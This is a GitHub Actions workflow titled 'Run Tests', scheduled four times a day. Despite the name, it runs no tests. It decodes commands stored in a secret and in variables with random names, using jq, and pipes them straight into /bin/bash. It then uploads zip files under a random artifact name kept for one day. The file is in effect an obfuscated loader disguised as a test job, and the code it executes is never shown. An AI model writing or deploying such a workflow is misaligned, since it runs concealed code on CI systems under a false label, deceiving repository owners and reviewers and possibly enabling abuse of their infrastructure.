name: Run Tests
on:
  workflow_dispatch:

  schedule:
    - cron: '10 1,7,13,19 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  agent:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Perform
        env:
          xiev17258: ${{ secrets.xiev17258 }}
        run: |
          printf '%s' "$xiev17258" | jq -r .n6516 | /bin/bash
          echo $ugku0788 | jq -r .kang068 | /bin/bash
          echo $mj77 | jq -r .lq89265 | /bin/bash
          printf '%s' "$ow7" | jq -r .iwah51210 | /bin/bash
          printf '%s' "$a2861" | jq -r .pin29 | /bin/bash

      - name: Upload results
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: NiirYlOH
          path: "*.zip"
          retention-days: 1
